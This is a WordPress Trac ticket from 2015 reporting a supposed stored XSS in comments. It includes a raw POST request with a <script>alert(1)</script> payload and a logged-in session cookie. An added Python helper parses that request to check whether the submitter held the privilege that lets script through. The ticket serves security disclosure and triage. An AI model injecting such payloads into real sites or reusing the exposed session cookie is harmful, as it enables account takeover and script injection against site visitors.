[wp-trac] [WordPress Trac] #33402: Zero Day on the Comment section on latest WordPress release
WordPress Trac
noreply at wordpress.org
Tue Aug 18 08:45:37 UTC 2015
#33402: Zero Day on the Comment section on latest WordPress release
--------------------------+-----------------------------
 Reporter:  3ntr0py       |       Owner:
     Type:  defect (bug)  |      Status:  new
 Priority:  normal        |   Milestone:  Awaiting Review
Component:  Security      |     Version:  4.2.4
 Severity:  normal        |    Keywords:
  Focuses:                |
--------------------------+-----------------------------
I found a stored XSS in the comment section of WordPress.
Stored Cross-site Scripting (XSS) is the most dangerous type of Cross Site
Scripting. Web applications that allow users to store data are potentially
exposed to this type of attack. This chapter illustrates examples of
stored cross site scripting injection and related exploitation scenarios.
The POST request I sent was:

POST /wordpress/wp-comments-post.php HTTP/1.1
Host: localhost
Content-Length: 162
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/wordpress/index.php/2015/08/17/hello-world/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=mmssbonu21%7C1440022264%7CYQQOLOtHYDiOWcY530mQphmeXi9RIx7DkSLh8kdqZZ4%7Cf611a27ebe5fd565b39e3bfff8ee680e8206219a14ccfdae75547f9d293c0025; wp-settings-time-1=1439881779

comment=testing11a6f<script>alert(1)<%2fscript>2f4c9&submit=Post+Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=556b24f545&_wp_unfiltered_html_comment=5753622fd1&ak_js=1439881790623
--
Ticket URL: <https://core.trac.wordpress.org/ticket/33402>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
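A triage helper, added here as an example that is not part of the ticket or of WordPress, which parses the request above and reports the facts a reviewer checks before treating a script tag in a comment as an injection: whether the comment field holds raw markup, whether the request carried a wordpress_logged_in_* cookie, and whether it included the _wp_unfiltered_html_comment nonce. WordPress renders that hidden field only for users holding the unfiltered_html capability and skips its kses filters for the comment when the nonce verifies, so the check decides whether the report still needs reproducing from an unprivileged account. The request text is copied from the ticket with the session cookie value replaced by a placeholder.

```python
import re
from urllib.parse import parse_qs

# Request copied from the ticket; the logged-in cookie value is replaced by a placeholder.
RAW_REQUEST = (
    "POST /wordpress/wp-comments-post.php HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: wordpress_test_cookie=WP+Cookie+check; "
    "wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=<placeholder>; "
    "wp-settings-time-1=1439881779\r\n"
    "\r\n"
    "comment=testing11a6f<script>alert(1)<%2fscript>2f4c9&submit=Post+Comment"
    "&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=556b24f545"
    "&_wp_unfiltered_html_comment=5753622fd1&ak_js=1439881790623"
)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

def parse_request(raw):
    """Split a raw HTTP request into (lower-cased header dict, decoded form-field dict)."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qs undoes the %2f and '+' encoding, so <%2fscript> becomes </script>
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return headers, fields

def parse_cookies(cookie_header):
    # 'a=1; b=2' -> {'a': '1', 'b': '2'}
    pairs = (p.strip().partition("=") for p in cookie_header.split(";"))
    return {name: value for name, _, value in pairs if name}

def triage_comment_submission(raw):
    """Collect the facts a reviewer checks before treating a script tag in a comment as an injection."""
    headers, fields = parse_request(raw)
    cookies = parse_cookies(headers.get("cookie", ""))
    flags = {
        "raw_script_in_comment": bool(SCRIPT_TAG.search(fields.get("comment", ""))),
        "logged_in_session": any(n.startswith("wordpress_logged_in_") for n in cookies),
        "unfiltered_html_nonce": "_wp_unfiltered_html_comment" in fields,
    }
    if not flags["raw_script_in_comment"]:
        flags["verdict"] = "no raw markup in comment"
    elif flags["logged_in_session"] and flags["unfiltered_html_nonce"]:
        flags["verdict"] = "privileged submission: reproduce as an unprivileged user first"
    else:
        flags["verdict"] = "unprivileged submission with raw markup: check kses filtering"
    return flags
```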